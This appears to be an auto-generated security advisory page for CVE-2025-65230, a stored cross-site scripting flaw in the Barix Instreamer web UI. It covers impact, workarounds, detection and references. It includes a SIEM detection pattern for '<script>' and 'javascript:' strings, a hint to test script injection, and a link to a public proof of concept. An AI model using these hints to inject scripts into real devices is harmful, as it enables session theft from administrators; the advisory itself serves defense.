CVE-2025-65230 – Barix Instreamer versions 04.06 and 04.05 conta... (How to Fix)

Q: What is the severity of CVE-2025-65230?

CVE-2025-65230 has a CVSS score of 5.4 (MEDIUM). Barix Instreamer versions 04.06 and 04.05 contain a stored cross-site scripting vulnerability in the Web UI's Streaming Destination configuration input. This allows attackers to inject malicious scripts that execute when administrators view the configuration page. Organizations using these vulnerable versions are affected.

📋 TL;DR

Barix Instreamer versions 04.06 and 04.05 contain a stored cross-site scripting vulnerability in the Web UI's Streaming Destination configuration input. This allows attackers to inject malicious scripts that execute when administrators view the configuration page. Organizations using these vulnerable versions are affected.

💻 Affected Systems

Products:

Barix Instreamer

Versions: v04.06 and v04.05

Operating Systems: Embedded Linux

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in the Web UI configuration interface for streaming destinations.

📦 What is this software?

Instreamer Firmware by Barix

View all CVEs affecting Instreamer Firmware →

Instreamer Firmware by Barix

View all CVEs affecting Instreamer Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator session cookies, perform actions as administrators, or deploy malware to administrator browsers, potentially leading to full system compromise.

🟠

Likely Case

Attackers with access to the configuration interface could inject scripts that steal credentials or perform unauthorized actions when administrators view the page.

🟢

If Mitigated

With proper input validation and output encoding, malicious scripts would be neutralized before execution, preventing exploitation.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires access to the configuration interface. Public proof-of-concept available in GitHub repository.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://help.barix.com/instreamer/user-manual

Restart Required: No

Instructions:

Check vendor website for security updates. If patch available, download and apply according to vendor instructions.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement server-side input validation to sanitize Streaming Destination field inputs

Not applicable - requires code modification

Content Security Policy

all

Implement strict Content Security Policy headers to prevent script execution

Add CSP header: Content-Security-Policy: default-src 'self'

🧯 If You Can't Patch

Restrict access to the Web UI configuration interface to trusted administrators only
Implement network segmentation to isolate Barix Instreamer devices from untrusted networks

🔍 How to Verify

Check if Vulnerable:

Check if running Barix Instreamer v04.06 or v04.05 and test if script tags can be injected in Streaming Destination field

Check Version:

Check Web UI interface or device management console for version information

Verify Fix Applied:

Verify updated version is installed and test that script injection no longer works

📡 Detection & Monitoring

Log Indicators:

Unusual characters or script tags in configuration logs
Multiple failed login attempts to Web UI

Network Indicators:

Suspicious HTTP requests to configuration endpoints
Unexpected outbound connections from device

SIEM Query:

source="barix_instreamer" AND (message="*<script>*" OR message="*javascript:*")

📊 Metadata

CVE ID: CVE-2025-65230

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.05% exploit probability (13.8th percentile)

Published: December 8, 2025

Last Updated: December 17, 2025

🔗 References

https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65230 Exploit,Third Party Advisory,Mitigation
https://help.barix.com/instreamer/user-manual Product
https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65230 Exploit,Third Party Advisory,Mitigation

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-65230, you might also want to check these: